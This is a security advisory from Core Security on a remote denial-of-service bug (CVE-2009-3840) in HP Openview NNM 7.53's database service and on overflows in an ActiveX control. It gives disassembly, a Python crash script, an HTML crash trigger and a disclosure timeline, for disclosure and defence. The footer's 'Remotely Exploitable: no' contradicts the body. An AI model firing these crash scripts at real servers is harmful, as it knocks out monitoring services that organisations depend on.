HP Openview NNM 7.53 Invalid DB Error Code vulnerability

Core Security - CoreLabs


HP Openview NNM 7.53 Invalid DB Error Code vulnerability

1.
Advisory Information

Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability
Advisory Id: CORE-2009-0814
Advisory URL: http://www.coresecurity.com/content/openview_nnm_internaldb_dos

Date published: 2009-11-17
Date of last update: 2009-11-17
Vendors contacted: HP
Release mode: Coordinated release

2.
Vulnerability Information

Class: External Initialization of Trusted Variables [CWE-454]

Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840

3.
Vulnerability Description

HP Openview Network Node Manager is one of the most widely-deployed network monitoring and management platforms used throughout enterprise organizations today. The platform includes many server and client-side core components with a long list of previously disclosed security bugs. In this case, a remotely exploitable vulnerability was found in the database server core component used by NNM. Exploitation of the bug does not require authentication and will lead to a remotely triggered denial of service of the internal database service.

4.
Vulnerable packages

  • HP Openview NNM 7.53

Other versions may be vulnerable but were not tested. Refer to the vendor's security bulletin for a full list.

5.
Non-vulnerable packages

Refer to the vendor's security bulletin.

6.
Vendor Information, Solutions and Workarounds

The vendor issued security bulletin HPSBMA02477 SSRT090177 to address the problem and provide fixes. It is available at
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980

The database service of HP Openview Network Node Manager is remotely accessible on port 2690/tcp. Restricting or blocking access to that port will prevent exploitation but may prevent normal operation of Openview NNM.

7.
Credits

This vulnerability was discovered and researched by Damián Frizza from Core Security Technologies.

8.
Technical Description / Proof of Concept Code

8.1.
HP Openview NNM 7.53 Embedded DB Remote Denial Of Service

HP Openview Network Node Manager includes an embedded database engine service that is enabled by default and accepts remote connections on port 2690/tcp. The service is implemented by the ovdbrun.exe which is started automatically on boot. For certain transactions upon receiving a packet from the network the service will attempt to determine and display an error code string based on an error code number specified in the packet. By sending a specifically crafted packet with an invalid error code number it is possible to remotely trigger an exception that forces abnormal termination of the service. It is unlikely that the bug could be exploited for anything other than a remote denial of service.

The following code excerpt explains the problem:

005FED51   MOVZX EDX,BYTE PTR SS:[ESP+2]     #FCFF
005FED56   MOVSX ECX,WORD PTR SS:[ESP+3]
005FED5B   CMP ECX,-1
005FED5E   MOVSX EAX,WORD PTR SS:[ESP+5]     #FCFF
005FED63   MOV DWORD PTR DS:[ESI+10],EDX
005FED66   MOV EDX,DWORD PTR SS:[ESP+7]
005FED6A   MOV DWORD PTR DS:[ESI+14],ECX
005FED6D   MOV DWORD PTR DS:[ESI+18],EAX
005FED70   MOV DWORD PTR DS:[ESI+C],EDX
005FED73   JGE SHORT ovdbrun.005FED7E
005FED75   CMP EAX,-1
005FED78   JGE SHORT ovdbrun.005FED7E
005FED7A   CMP ECX,EAX
005FED7C   JE SHORT ovdbrun.005FED83
005FED7E   MOV EAX,1
005FED83   ADD ESP,0C
005FED86   RETN

The code above checks for an error condition based on the value of an Error Code field in the inbound network packet. An error condition is explicitly handled if the Error Code value is less or equal than -1 in which case a MessageBox with a corresponding descriptive error string will be presented to the user. However by crafting a packet with any negative value in the Error Code field different that -1 the lookup for the corresponding error string will fail triggering a non-recoverable error and thus terminating the server process.

The following python code can be used to reproduce the bug:

#!python
import socket
import struct

a =  struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H',0xFEFF)
a += struct.pack('<H',0xFEFF)
a += "1234"

target_ip = 'X.X.X.X'

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2690))

s.send(a)
s.close()

8.2.
Additional information: Low severity bugs in ActiveDom.ocx ActiveX

The ActiveX control ActiveDom.ocx is shipped with HP Openview NNM 7.53 and installed by default. The control is prone to multiple memory corruption bugs due to erroneous handling of overly long strings passed to multiple methods. These bugs are considered of low severity because the control is not configured as Safe for Scripting or Safe for Initialization [1] and therefore cannot be exploited without explicit user consent. Since the control was reported by the vendor as not used nor required by any component of OpenView NNM, finding deployed systems with security configuration settings changed to allow exploitation of these bugs is very unlikely. Nonetheless information about them is included below for the purpose of completeness in the documentation of this advisory.

Some of the ActiveX control's methods with implementation flaws are:

DisplayName(str)
AddGroup(str)
InstallComponent(str)
Subscribe(str, str, int)

The following excerpt from method DisplayName() demonstrates the problem:

2000D408   MOV DWORD PTR SS:[EBP-4],-1
2000D40F   JMP SHORT ACTIVE~1.2000D3D6
2000D411   MOV EAX,ACTIVE~1.200361A0
2000D416   JMP <JMP.&MSVCRT.__CxxFrameHandler>
2000D41B   MOV EAX,ACTIVE~1.2000D4A8
2000D420   CALL <JMP.&MSVCRT._EH_prolog>
2000D425   SUB ESP,10
2000D428   PUSH EBX
2000D429   PUSH ESI
2000D42A   PUSH EDI
2000D42B   MOV DWORD PTR SS:[EBP-10],ESP
2000D42E   MOV DWORD PTR SS:[EBP-14],ECX
2000D431   XOR EBX,EBX
2000D433   MOV DWORD PTR SS:[EBP-4],EBX
2000D436   LEA ESI,DWORD PTR DS:[ECX+28]
2000D439   MOV ECX,DWORD PTR DS:[ESI]        ; ESI = 00038178
2000D43B   MOV EAX,DWORD PTR DS:[ECX]        ;
2000D43D   CALL DWORD PTR DS:[EAX+48]        ;

The following HTML code can be used to trigger the bug:

<html>
<object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target' ></object>
<script>
a = ""
for (i = 0; i < 10000; i++)
   a = a + "A"
target.DisplayName(a)
</script>
</html>

9.
Report Timeline

  • 2009-08-12:
    Core Security Technologies notifies the HP Software Security Response Team (SSRT) of the vulnerability and preliminary schedule to publish the corresponding security advisory on September 8th 2009. Core asks for acknowledgement of the email within 2 working days and whether HP SSRT prefers to receive the technical description of the bug encrypted or in plaintext.
  • 2009-08-12:
    HP SSRT asks Core to send the technical description of the vulnerability encrypted using the PGP key with id 0x08B83D45.
  • 2009-08-14:
    Core Security Technologies sends technical details encrypted to HP SSRT.
  • 2009-08-18:
    HP SSRT informs Core that HP engineering have been notified and will notify Core when they have a schedule estimate. SSRT assigned the IDs SSRT090177 and SSRT090178 to the vulnerabilities reported by Core.
  • 2009-08-27:
    Core requests a status update from HP SSRT.
  • 2009-08-27:
    HP SSRT informs Core that the vulnerabilities are in third-party code and that the third-party vendor has been notified but there isn't a schedule for fixes yet. HP SSRT indicates that it is sure HP will not have a solution ready by September 7th.
  • 2009-08-27:
    Core informs the HP team that the publication was re-scheduled to September 21st and requests an update to continue coordinating the release of fixes and publication of the advisory as soon as possible.
  • 2009-08-28:
    The HP team informs Core that the third party if planning a release on October 30th for the first vulnerability. SSRT also notes that ActiveX vulnerabilities are still being investigated.
  • 2009-08-31:
    Core Security Technologies acknowledges the information sent by HP SSRT.
  • 2009-09-01:
    The HP team communicates that they will inform Core Security Technologies when the fix is available.
  • 2009-09-04:
    Core asks the HP SSRT to map HP's internal IDs to each of the reported vulnerability.
  • 2009-09-04:
    The HP SSRT indicates that SSRT090177 corresponds to the embedded database vulnerability and SSRT090178 to the ActiveX bugs.
  • 2009-09-10:
    Core Security Technologies notifies HP SSRT that publication of the advisory has been re-scheduled to October 30th to be able to coordinate the release with the issuance of fixes by the third party vendor and that if non-third-party vulnerabilities (the ActiveX bugs) could be fixed earlier they would be described in a separate advisory.
  • 2009-09-11:
    HP SSRT says that it will send any new information to Core on the ActiveX bugs if they have something to publish before October 30th.
  • 2009-09-21:
    The HP team informs Core that they are having some problems reproducing the ActiveX vulnerabilities reported. The NNM engineers have used the provided proof-of-concept exploit but did not see any effect. SSRT asks if an overflow was confirmed, if process failure was detected and if a debugger or a different procedure was used.
  • 2009-09-21:
    Core Security Technologies notifies the HP SSRT that the proof of concept crash can be observed using a classic debugger or a just-in-time debugger that is attached only after an abnormal exception is detected. Core also sends HP SSRT another proof of concept HTML code that crashes the ActiveX and can be observed without the need of a debugger.
  • 2009-09-22:
    The HP team acknowledges previous email from Core with the new PoC to reproduce the crashes without a debugger.
  • 2009-10-06:
    Core requests a status update from the SSRT noting that it hasn't received any update since September 22nd. The advisory is still scheduled for publication on October 30th and Core is waiting for confirmation that the ActiveX bugs were reproduced and the fix for them could be published earlier separately.
  • 2009-10-09:
    SSRT updates indicating that fixes from the third party for SSRT090177 have been received and HP is currently in the process of testing them on all platforms expecting an update by October 16th. The ActiveX bugs have been reproduced and HP determined that the vulnerable control is not necessary for NNM. HP will recommend customers to set the kill bit for the control (clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as workaround.
  • 2009-10-19:
    Core requests a status update and confirmation that HP will be ready to release fixes by October 30th. Core asks if fixes will be issued for all vulnerable versions of NNM, whether the fixes or patches will remove the unnecessary ActiveX control or just ask customers to implement the workaround. Core requests the complete lists of vulnerable versions and platforms of NNM and asks if the patches will include fixes to other bugs. Also, Core notes that the vendor of the third party component has been identified and that since the bug may affect other products Core will start a separate vulnerability report process directly with that vendor.
  • 2009-11-02:
    Email from Core asking for a status update and an acknowledgement and response to the questions from the previous email. Core notes that the previously agreed publication date for the advisory has already passed without any update from HP. The publication date has been unilaterally moved to Wednesday November 4th. 2009 and is considered final pending a response from HP.
  • 2009-11-03:
    Response from HP SSRT stating that there is not an estimated release date for patches to some platforms. With regards to the ActiveX bugs, a security bulletin will be published on November 9th recommending setting the kill bit.
  • 2009-11-03:
    Core indicates that since there isn't an estimated patch release date for missing platforms the advisory will be published on November 9th and will include guidance on how to implement workarounds for both problems. Core asks SSRT about the potential impact of blocking or restricting access to the vulnerable service as a workaround.
  • 2009-11-05:
    SSRT suggests that given that Core advisory will be published earlier than HP's security bulletin it should have workarounds for all platforms and not just for the ones that may not have a patch available afterwards. HP is still investigating the impact of blocking or restricting access to the vulnerable port. SSRT asks if Core wants any acknowledgement in its security bulletin
  • 2009-11-05:
    Core asks what is the planned publication date for HP's bulletin and requests that the bulletin credits the discoverer (Damián Frizza). Provided that the estimated date for publishing the bulletin is not unreasonable Core would rather schedule the publication of the advisory to match HP's.
  • 2009-11-06:
    SSRT informs that their estimate is to have hotfixes available internally by November 13th and released along with the corresponding security bulletins by November 17th. SSRT ask whether CVE numbers should be assigned by HP or provided by Core.
  • 2009-11-06:
    Core re-schedules publication to November 17th. Core asks SSRT to assign the CVE numbers.
  • 2009-11-12:
    HP SSRT reports that the ActiveX control is not marked as safe for scripting or safe for initialization by default and thus the buffer overflows in its methods do not seem to be security issues. Asks if Core still considers them security vulnerabilities.
  • 2009-11-16:
    HP SSRT provides the CVE id assigned to the denial of service bug. Indicates that the vendor's security bulletin will not suggest any workarounds as the effect of blocking or restricting access to the vulnerable service has not been determined.
  • 2009-11-16:
    Core confirms that the ActiveX control is not marked as safe for scripting or initialization which greatly diminishes the relevance of the reported bugs. Nonetheless, the information about the bugs will be included in the advisory for the purpose of completeness and to let users verify, and if necessary correct, the control's configuration settings. Core still recommends the vendor to remove the unnecessary control from installation packages and fix the reported bugs to avoid potential introduction of flaws if it becomes a used control in the future or should an alternative exploitation vector be found.
  • 2009-11-17:
    Publication of HP Security Bulletin SSRT090177.
  • 2009-11-17:
    Advisory CORE-2009-0814 published.

10.
References

[1] Safe Initialization and Scripting for ActiveX Controls.
http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx
[2] How to stop an ActiveX control from running in Internet Explorer.
http://support.microsoft.com/kb/240797

11.
About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs.

12.
About Core Security Technologies

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

13.
Disclaimer

The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

14.
PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.

Locally Exploitable: 
no
Remotely Exploitable: 
no
  • Request Info

Research Blog